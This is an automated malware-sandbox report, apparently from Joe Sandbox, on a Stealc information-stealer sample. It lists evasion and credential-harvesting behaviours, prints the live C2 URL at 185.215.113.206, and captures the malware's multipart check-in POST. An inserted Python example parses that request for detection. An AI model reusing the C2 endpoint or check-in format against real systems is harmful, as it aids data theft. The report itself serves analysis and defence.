Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560183
MD5: 215acb5ad199adeadc4c630b59f09d17
SHA1: 76609d0d3867fa6d84da0958b5c1a954e8643f49
SHA256: 4596bafc0efc36a8f3ec2574dba1e8ae82e5b6051a2b5cce1605057a20855072
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 215ACB5AD199ADEADC4C630B59F09D17)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1714259793.0000000005190000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7112 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7112 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-21T14:26:09.407143+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP

              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpC9l | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007D4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_007D60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007F40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007E6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_007DEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_007E6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_007D9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_007D9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_007D7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_007E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_007ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_007EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_007D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_007D16A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 43 41 42 39 37 39 38 44 45 32 33 39 32 34 36 39 36 33 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a
  Data Ascii (CRLF line endings shown as line breaks):
    ------GDHIEHJEBAAFIDHJEBGI
    Content-Disposition: form-data; name="hwid"

    DFCAB9798DE23924696330
    ------GDHIEHJEBAAFIDHJEBGI
    Content-Disposition: form-data; name="build"

    mars
    ------GDHIEHJEBAAFIDHJEBGI--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 connections observed)
Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.000000000123E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.0000000001297000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.1770105162.0000000001285000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC9l
Source: file.exe, 00000000.00000002.1770105162.00000000012A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/k
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_007D9770
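The check-in captured above is a plain multipart/form-data POST carrying two fields, hwid and build, sent with no User-Agent header (the report's "HTTP GET or POST without a user agent" signature). The Python below is an added worked example, not part of the Joe Sandbox report and not Stealc code: it rebuilds the captured request from the bytes shown above, parses the body with a minimal multipart parser, and reports the traits a detection engineer could pivot on. The request head and body constants are reconstructed from this capture; the classification heuristics (exactly the fields hwid and build, a boundary drawn only from the letters A-J, a missing User-Agent, Content-Length matching the body) are assumptions drawn from this single sample, not a vendor signature.

```python
import re

# Constructed from the request shown above (headers and the "Data Ascii" view with
# the CRLFs restored). The body is 211 bytes, exactly the declared Content-Length.
CAPTURED_HEAD = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGI\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
CAPTURED_BODY = (
    b"------GDHIEHJEBAAFIDHJEBGI\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"DFCAB9798DE23924696330\r\n"
    b"------GDHIEHJEBAAFIDHJEBGI\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"mars\r\n"
    b"------GDHIEHJEBAAFIDHJEBGI--\r\n"
)


def parse_request_head(head: bytes):
    """Split a raw HTTP request head into (method, target, {lower-case header: value})."""
    lines = head.rstrip(b"\r\n").split(b"\r\n")
    method, target, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def boundary_from_content_type(content_type: str) -> bytes:
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode("latin-1")


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Minimal multipart/form-data parser: {field name: value} for every part."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:   # [0] is the (empty) preamble
        if part.startswith(b"--"):                  # closing delimiter "--boundary--"
            break
        if not part.startswith(b"\r\n"):
            raise ValueError("malformed part delimiter")
        head, sep, value = part[2:].partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        name = re.search(rb'name="([^"]*)"', head)
        if not name:
            raise ValueError("part without a field name")
        if value.endswith(b"\r\n"):                 # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def classify_checkin(head: bytes, body: bytes) -> dict:
    """Describe one request against traits taken from this single capture (assumed
    heuristics, not a vendor signature): POST of exactly hwid + build, declared
    length matching the body, no User-Agent, boundary letters all within A-J."""
    method, target, headers = parse_request_head(head)
    boundary = boundary_from_content_type(headers.get("content-type", ""))
    fields = parse_multipart(body, boundary)
    return {
        "target": target,
        "fields": fields,
        "length_ok": headers.get("content-length") == str(len(body)),
        "no_user_agent": "user-agent" not in headers,
        "boundary_alphabet_ok": all(c in b"ABCDEFGHIJ" for c in boundary.lstrip(b"-")),
        "checkin_shape": method == "POST" and set(fields) == {"hwid", "build"},
    }


if __name__ == "__main__":
    print(classify_checkin(CAPTURED_HEAD, CAPTURED_BODY))
```

On the capture above this yields the hwid DFCAB9798DE23924696330 and the build tag mars with every heuristic true. The same two functions work on a body pulled from a pcap with tshark or scapy; the only coupling to this sample is in the constants and in the thresholds named in classify_checkin's docstring.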

              System Summary

Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank or non-printable name)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B93824
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B861F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7AA17
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8B207
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9024A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8EBBB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B8CCDF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B87C36
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B83471
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A9ED5D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ADFE1B
